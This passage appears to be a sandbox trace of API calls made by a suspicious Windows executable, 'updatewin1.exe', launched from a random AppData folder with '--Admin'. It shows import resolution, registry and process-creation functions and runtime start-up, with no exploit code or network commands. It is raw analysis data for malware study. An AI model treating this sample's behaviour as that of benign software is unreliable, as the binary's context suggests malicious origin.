out: lpflOldProtect=0x18f5d8*=0x2) returned 1 [0045.790] VirtualFree (lpAddress=0x290000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0045.791] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x76c20000 [0045.791] GetProcAddress (hModule=0x76c20000, lpProcName="CreateFileA") returned 0x76c353c6 [0045.791] GetProcAddress (hModule=0x76c20000, lpProcName="WriteFile") returned 0x76c31282 [0045.792] GetProcAddress (hModule=0x76c20000, lpProcName="FlushFileBuffers") returned 0x76c3469b [0045.792] GetProcAddress (hModule=0x76c20000, lpProcName="CloseHandle") returned 0x76c31410 [0045.792] GetProcAddress (hModule=0x76c20000, lpProcName="CreateProcessA") returned 0x76c31072 [0045.792] GetProcAddress (hModule=0x76c20000, lpProcName="lstrcpyW") returned 0x76c53102 [0045.792] GetProcAddress (hModule=0x76c20000, lpProcName="CreateProcessW") returned 0x76c3103d [0045.792] GetProcAddress (hModule=0x76c20000, lpProcName="WaitForSingleObject") returned 0x76c31136 [0045.792] GetProcAddress (hModule=0x76c20000, lpProcName="CreateFileW") returned 0x76c33f5c [0045.792] GetProcAddress (hModule=0x76c20000, lpProcName="lstrlenA") returned 0x76c35a4b [0045.792] GetProcAddress (hModule=0x76c20000, lpProcName="WideCharToMultiByte") returned 0x76c3170d [0045.792] GetProcAddress (hModule=0x76c20000, lpProcName="MultiByteToWideChar") returned 0x76c3192e [0045.792] GetProcAddress (hModule=0x76c20000, lpProcName="GetCommandLineW") returned 0x76c35223 [0045.793] GetProcAddress (hModule=0x76c20000, lpProcName="WriteConsoleW") returned 0x76c57aca [0045.793] GetProcAddress (hModule=0x76c20000, lpProcName="SetFilePointerEx") returned 0x76c4c807 [0045.793] GetProcAddress (hModule=0x76c20000, lpProcName="GetConsoleMode") returned 0x76c31328 [0045.793] GetProcAddress (hModule=0x76c20000, lpProcName="DeleteFileA") returned 0x76c35444 [0045.793] GetProcAddress (hModule=0x76c20000, lpProcName="HeapReAlloc") returned 0x77171f6e [0045.793] GetProcAddress (hModule=0x76c20000, lpProcName="HeapSize") returned 0x77163002 [0045.793] GetProcAddress (hModule=0x76c20000, lpProcName="GetProcessHeap") returned 0x76c314e9 [0045.793] GetProcAddress (hModule=0x76c20000, lpProcName="LCMapStringW") returned 0x76c317b9 [0045.793] GetProcAddress (hModule=0x76c20000, lpProcName="GetStringTypeW") returned 0x76c31946 [0045.793] GetProcAddress (hModule=0x76c20000, lpProcName="GetFileType") returned 0x76c33531 [0045.793] GetProcAddress (hModule=0x76c20000, lpProcName="SetStdHandle") returned 0x76cb454f [0045.793] GetProcAddress (hModule=0x76c20000, lpProcName="lstrcatA") returned 0x76c52b7a [0045.793] GetProcAddress (hModule=0x76c20000, lpProcName="lstrcpyA") returned 0x76c52a9d [0045.793] GetProcAddress (hModule=0x76c20000, lpProcName="GetEnvironmentVariableA") returned 0x76c333a0 [0045.793] GetProcAddress (hModule=0x76c20000, lpProcName="GetShortPathNameA") returned 0x76c5594d [0045.793] GetProcAddress (hModule=0x76c20000, lpProcName="GetModuleFileNameA") returned 0x76c314b1 [0045.793] GetProcAddress (hModule=0x76c20000, lpProcName="GetConsoleCP") returned 0x76cd7bff [0045.794] GetProcAddress (hModule=0x76c20000, lpProcName="SetLastError") returned 0x76c311a9 [0045.794] GetProcAddress (hModule=0x76c20000, lpProcName="FreeEnvironmentStringsW") returned 0x76c351cb [0045.794] GetProcAddress (hModule=0x76c20000, lpProcName="GetEnvironmentStringsW") returned 0x76c351e3 [0045.794] GetProcAddress (hModule=0x76c20000, lpProcName="GetCommandLineA") returned 0x76c351a1 [0045.794] GetProcAddress (hModule=0x76c20000, lpProcName="GetCPInfo") returned 0x76c35189 [0045.794] GetProcAddress (hModule=0x76c20000, lpProcName="GetOEMCP") returned 0x76c5d1a1 [0045.794] GetProcAddress (hModule=0x76c20000, lpProcName="IsValidCodePage") returned 0x76c34493 [0045.794] GetProcAddress (hModule=0x76c20000, lpProcName="UnhandledExceptionFilter") returned 0x76c5772f [0045.794] GetProcAddress (hModule=0x76c20000, lpProcName="SetUnhandledExceptionFilter") returned 0x76c387c9 [0045.794] GetProcAddress (hModule=0x76c20000, lpProcName="GetCurrentProcess") returned 0x76c31809 [0045.794] GetProcAddress (hModule=0x76c20000, lpProcName="TerminateProcess") returned 0x76c4d802 [0045.794] GetProcAddress (hModule=0x76c20000, lpProcName="IsProcessorFeaturePresent") returned 0x76c35235 [0045.794] GetProcAddress (hModule=0x76c20000, lpProcName="QueryPerformanceCounter") returned 0x76c31725 [0045.794] GetProcAddress (hModule=0x76c20000, lpProcName="GetCurrentProcessId") returned 0x76c311f8 [0045.794] GetProcAddress (hModule=0x76c20000, lpProcName="GetCurrentThreadId") returned 0x76c31450 [0045.794] GetProcAddress (hModule=0x76c20000, lpProcName="GetSystemTimeAsFileTime") returned 0x76c33509 [0045.795] GetProcAddress (hModule=0x76c20000, lpProcName="InitializeSListHead") returned 0x771694a4 [0045.795] GetProcAddress (hModule=0x76c20000, lpProcName="IsDebuggerPresent") returned 0x76c34a5d [0045.795] GetProcAddress (hModule=0x76c20000, lpProcName="GetStartupInfoW") returned 0x76c34d40 [0045.795] GetProcAddress (hModule=0x76c20000, lpProcName="GetModuleHandleW") returned 0x76c334b0 [0045.795] GetProcAddress (hModule=0x76c20000, lpProcName="RtlUnwind") returned 0x76c5d1c3 [0045.795] GetProcAddress (hModule=0x76c20000, lpProcName="RaiseException") returned 0x76c358a6 [0045.795] GetProcAddress (hModule=0x76c20000, lpProcName="GetLastError") returned 0x76c311c0 [0045.795] GetProcAddress (hModule=0x76c20000, lpProcName="EncodePointer") returned 0x77170fcb [0045.795] GetProcAddress (hModule=0x76c20000, lpProcName="EnterCriticalSection") returned 0x771522b0 [0045.795] GetProcAddress (hModule=0x76c20000, lpProcName="LeaveCriticalSection") returned 0x77152270 [0045.795] GetProcAddress (hModule=0x76c20000, lpProcName="DeleteCriticalSection") returned 0x771645f5 [0045.795] GetProcAddress (hModule=0x76c20000, lpProcName="InitializeCriticalSectionAndSpinCount") returned 0x76c31916 [0045.795] GetProcAddress (hModule=0x76c20000, lpProcName="TlsAlloc") returned 0x76c349ad [0045.795] GetProcAddress (hModule=0x76c20000, lpProcName="TlsGetValue") returned 0x76c311e0 [0045.795] GetProcAddress (hModule=0x76c20000, lpProcName="TlsSetValue") returned 0x76c314fb [0045.795] GetProcAddress (hModule=0x76c20000, lpProcName="TlsFree") returned 0x76c33587 [0045.795] GetProcAddress (hModule=0x76c20000, lpProcName="FreeLibrary") returned 0x76c334c8 [0045.796] GetProcAddress (hModule=0x76c20000, lpProcName="GetProcAddress") returned 0x76c31222 [0045.796] GetProcAddress (hModule=0x76c20000, lpProcName="LoadLibraryExW") returned 0x76c3495d [0045.796] GetProcAddress (hModule=0x76c20000, lpProcName="GetStdHandle") returned 0x76c351b3 [0045.796] GetProcAddress (hModule=0x76c20000, lpProcName="GetModuleFileNameW") returned 0x76c34950 [0045.796] GetProcAddress (hModule=0x76c20000, lpProcName="ExitProcess") returned 0x76c37a10 [0045.796] GetProcAddress (hModule=0x76c20000, lpProcName="GetModuleHandleExW") returned 0x76c34a6f [0045.796] GetProcAddress (hModule=0x76c20000, lpProcName="GetACP") returned 0x76c3179c [0045.796] GetProcAddress (hModule=0x76c20000, lpProcName="HeapAlloc") returned 0x7715e026 [0045.796] GetProcAddress (hModule=0x76c20000, lpProcName="HeapFree") returned 0x76c314c9 [0045.796] GetProcAddress (hModule=0x76c20000, lpProcName="FindClose") returned 0x76c34442 [0045.796] GetProcAddress (hModule=0x76c20000, lpProcName="FindFirstFileExW") returned 0x76c41811 [0045.796] GetProcAddress (hModule=0x76c20000, lpProcName="FindNextFileW") returned 0x76c354ee [0045.796] GetProcAddress (hModule=0x76c20000, lpProcName="DecodePointer") returned 0x77169d35 [0045.796] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x74d40000 [0045.796] GetProcAddress (hModule=0x74d40000, lpProcName="RegOpenKeyExW") returned 0x74d5468d [0045.797] GetProcAddress (hModule=0x74d40000, lpProcName="RegCloseKey") returned 0x74d5469d [0045.797] GetProcAddress (hModule=0x74d40000, lpProcName="RegCreateKeyExW") returned 0x74d540fe [0045.797] GetProcAddress (hModule=0x74d40000, lpProcName="SetSecurityDescriptorDacl") returned 0x74d5415e [0045.797] GetProcAddress (hModule=0x74d40000, lpProcName="InitializeSecurityDescriptor") returned 0x74d54620 [0045.797] GetProcAddress (hModule=0x74d40000, lpProcName="RegSetValueExW") returned 0x74d514d6 [0045.797] LoadLibraryA (lpLibFileName="SHELL32.dll") returned 0x75fd0000 [0045.797] GetProcAddress (hModule=0x75fd0000, lpProcName="ShellExecuteExW") returned 0x75ff1e46 [0045.797] GetProcAddress (hModule=0x75fd0000, lpProcName="SHGetFolderPathW") returned 0x76055708 [0045.797] GetProcAddress (hModule=0x75fd0000, lpProcName="CommandLineToArgvW") returned 0x75fe9ee8 [0045.797] LoadLibraryA (lpLibFileName="SHLWAPI.dll") returned 0x75340000 [0045.797] GetProcAddress (hModule=0x75340000, lpProcName="PathAppendW") returned 0x753581ef [0045.797] GetProcAddress (hModule=0x75340000, lpProcName="PathFileExistsA") returned 0x7537ad1a [0045.797] GetProcAddress (hModule=0x75340000, lpProcName="PathRemoveFileSpecW") returned 0x75353248 [0045.797] LoadLibraryA (lpLibFileName="msvcr100.dll") returned 0x749c0000 [0045.800] GetProcAddress (hModule=0x749c0000, lpProcName="atexit") returned 0x749dc544 [0045.800] atexit (param_1=0x3163e0) returned 0 [0045.801] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18f5dc | out: lpSystemTimeAsFileTime=0x18f5dc*(dwLowDateTime=0x19a7d0b0, dwHighDateTime=0x1d5956a)) [0045.801] GetCurrentThreadId () returned 0xa18 [0045.801] GetCurrentProcessId () returned 0xa14 [0045.801] QueryPerformanceCounter (in: lpPerformanceCount=0x18f5d4 | out: lpPerformanceCount=0x18f5d4*=16597118967) returned 1 [0045.809] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0045.810] LoadLibraryExW (lpLibFileName="api-ms-win-core-synch-l1-2-0", hFile=0x0, dwFlags=0x800) returned 0x0 [0045.810] GetLastError () returned 0x57 [0045.810] LoadLibraryExW (lpLibFileName="kernel32", hFile=0x0, dwFlags=0x800) returned 0x0 [0045.810] GetLastError () returned 0x57 [0045.811] LoadLibraryExW (lpLibFileName="kernel32", hFile=0x0, dwFlags=0x0) returned 0x76c20000 [0045.811] GetProcAddress (hModule=0x76c20000, lpProcName="InitializeCriticalSectionEx") returned 0x76c34d28 [0045.811] LoadLibraryExW (lpLibFileName="api-ms-win-core-fibers-l1-1-1", hFile=0x0, dwFlags=0x800) returned 0x0 [0045.811] GetLastError () returned 0x57 [0045.811] GetProcAddress (hModule=0x76c20000, lpProcName="FlsAlloc") returned 0x76c34f2b [0045.811] GetProcAddress (hModule=0x76c20000, lpProcName="FlsSetValue") returned 0x76c34208 [0045.813] LoadLibraryExW (lpLibFileName="api-ms-win-core-synch-l1-2-0", hFile=0x0, dwFlags=0x800) returned 0x0 [0045.813] GetLastError () returned 0x57 [0045.813] LoadLibraryExW (lpLibFileName="kernel32", hFile=0x0, dwFlags=0x800) returned 0x0 [0045.813] GetLastError () returned 0x57 [0045.813] LoadLibraryExW (lpLibFileName="kernel32", hFile=0x0, dwFlags=0x0) returned 0x76c20000 [0045.813] GetProcAddress (hModule=0x76c20000, lpProcName="InitializeCriticalSectionEx") returned 0x76c34d28 [0045.813] GetProcessHeap () returned 0x300000 [0045.813] LoadLibraryExW (lpLibFileName="api-ms-win-core-fibers-l1-1-1", hFile=0x0, dwFlags=0x800) returned 0x0 [0045.813] GetLastError () returned 0x57 [0045.813] GetProcAddress (hModule=0x76c20000, lpProcName="FlsAlloc") returned 0x76c34f2b [0045.813] GetLastError () returned 0x57 [0045.813] GetProcAddress (hModule=0x76c20000, lpProcName="FlsGetValue") returned 0x76c31252 [0045.813] RtlAllocateHeap (HeapHandle=0x300000, Flags=0x8, Size=0x364) returned 0x32a9f0 [0045.813] SetLastError (dwErrCode=0x57) [0045.814] RtlAllocateHeap (HeapHandle=0x300000, Flags=0x8, Size=0xc00) returned 0x32ad60 [0045.816] GetStartupInfoW (in: lpStartupInfo=0x18f510 | out: lpStartupInfo=0x18f510*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\4883c25a-c55c-46aa-a0b1-c2c0b01a64fc\\updatewin1.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x5, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x4033b0, hStdOutput=0xc5680f0e, hStdError=0xfffffffe)) [0045.816] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0045.816] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0045.816] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0045.816] GetCommandLineA () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\4883c25a-c55c-46aa-a0b1-c2c0b01a64fc\\updatewin1.exe\" --Admin" [0045.816] GetCommandLineW () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\4883c25a-c55c-46aa-a0b1-c2c0b01a64fc\\updatewin1.exe\" --Admin" [0045.816] IsValidCodePage (CodePage=0x4e4) returned 1 [0045.816] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18f530 | out: lpCPInfo=0x18f530) returned 1 [0045.816] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18edf8 | out: lpCPInfo=0x18edf8) returned 1 [0045.816] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18f40c, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0045.816] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18f40c, cbMultiByte=256, lpWideCharStr=0x18eb98, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0045.816] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpCharType=0x18ee0c | out: lpCharType=0x18ee0c) returned 1 [0045.817] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18f40c, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0045.817] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18f40c, cbMultiByte=256, lpWideCharStr=0x18eb48, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ굧@Ā") returned 256 [0045.817] LoadLibraryExW (lpLibFileName="api-ms-win-core-localization-l1-2-1", hFile=0x0, dwFlags=0x800) returned 0x0 [0045.817] GetLastError () returned 0x57 [0045.817] GetProcAddress (hModule=0x76c20000, lpProcName="LCMapStringEx") returned 0x76cb47f1 [0045.817] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ굧@Ā", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0045.817] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ굧@Ā", cchSrc=256, lpDestStr=0x18e938, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȈ") returned 256 [0045.817] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȈ", cchWideChar=256, lpMultiByteStr=0x18f30c, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿÖª1ÅHõ\x18", lpUsedDefaultChar=0x0) returned 256 [0045.817] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18f40c, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0045.817] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18f40c, cbMultiByte=256, lpWideCharStr=0x18eb68, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0045.817] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0045.817] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x18e958, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȈ") returned 256 [0045.817] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȈ", cchWideChar=256, lpMultiByteStr=0x18f20c, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f 